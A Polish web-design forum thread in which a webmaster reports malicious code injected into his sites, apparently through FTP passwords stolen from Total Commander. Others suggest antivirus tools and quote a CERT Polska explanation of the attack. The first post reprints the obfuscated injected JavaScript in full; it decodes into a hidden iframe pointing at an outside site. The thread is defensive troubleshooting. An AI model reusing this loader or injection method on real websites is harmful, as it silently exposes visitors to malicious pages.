SWiSH Forum

[^sl01k]

witam
kilka osob zwrocilo mi uwage na to ze na niektorych moich stronach sa virusy ...

i troche prawdy w tym jest ... po analizie dostrzeglem ze mam jakis krzak w kodzie .... którego nie pisałem sam..
cos takiego

Kod:

<!-- ad --><script language="JavaScript">function rkfg(jflq){return String.fromCharCode(jflq);}var ohhe="060105102114097109101032115114099061039104116116112058047047115117112101114105111114097100122046105110102111047111112105115047063116061049051039032119105100116104061039048039032104101105103104116061039048039032115116121108101061039118105115105098105108105116121058032104105100100101110059039062060047105102114097109101062";var ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=rkfg(ohhe.substr (qhxk, 3));}window.status='Done';document.write(ifdm);</script> <!-- /ad -->

google wytlumaczylo mi ze zlapalem wira ktory wkrada sie do total commandera i wykrada z jego hasla... i dopisuje do index.html, main.html dziwny kod ktory wysyla infom do jakiejs strony ...

vira nie wykrtywa mi zaden antywir ...
co gorsza zmiana hasła nic nie daje... chyba ze nie uzywam Total commandera...
a uzywac mam zamiar... wiec te niegrozne wiry bede mial na niektorych stronach chyba ze znajde rozwiazanie albo zdobede sie na format ...

[^shastaan]

zlapalem sie na tym samym jakis czas temu

avira antivir personal to wykrywa (w ogole polecam, fajny i darmowy)

ja juz problemu nie mam bo zrobilem format...

[UndefinedMan]

widzę ze lamdrew.pl działa już, wcześniej kaspersky mi strone blokowal

[grave]

Witam, ponieważ miałem podobny problem na jednej ze swoich stron podsyłam ciekawy tekst ze strony cert.pl odnośnie złośliwego kodu na przykładzie strony pajacyk.pl .


Mechanizm doklejania złośliwych skryptów do popularnych stron WWW często polega na wykorzystywaniu zdobytych haseł do serwerów FTP, na których strony te są hostowane. Jeśli komputer webmastera strony jest zainfekowany działającym w ten sposób koniem trojańskim, to przy aktualizacji strony za pomocą klienta FTP trojan przechwytuje dane logowania do konta FTP, po czym ściąga z serwera odpowiedni plik ze stroną główną (np. index.html, index.htm, index.php), dokleja złośliwy skrypt JS (często tuż za znacznikiem <body> lub tak jak w przypadku Pajacyka tuż przed znacznikiem </body>) i na koniec wysyła tak zmodyfikowaną wersję strony z powrotem na serwer FTP. Coraz popularniejsza jest też metoda zorientowana na wykorzystywanie haseł już zapamiętanych w klientach FTP - często dotyczą one aplikacji Total Commander. Dlatego, oczywiście oprócz posiadania programu antywirusowego z aktualną bazą sygnatur, zalecamy nie korzystać z mechanizmu zapamiętywania haseł w tego typu programach. Szczególnie webmasterzy powinni zwracać uwagę i sprawdzać, czy strony przez nich zarządzane nie zostały zaatakowane w podobny sposób.

Metoda polegająca na umieszczaniu przekierowań do złośliwych stron na innych popularnych witrynach zyskuje coraz większą popularność wśród cyberprzestępców, ponieważ zaufanie do takich stron jest duże (zdecydowanie większe niż na przykład do adresu wysłanego w spamie), a poza tym są one odwiedzane przez dużą liczbę niczego nie podejrzewających internautów (atakujący nie musi dodatkowo zachęcać do wejścia na taką stronę i rozsyłać jej adresu).

Pełna treść newsa:
http://www.cert.pl/news/tag/wirus

Pozdrawiam
Grave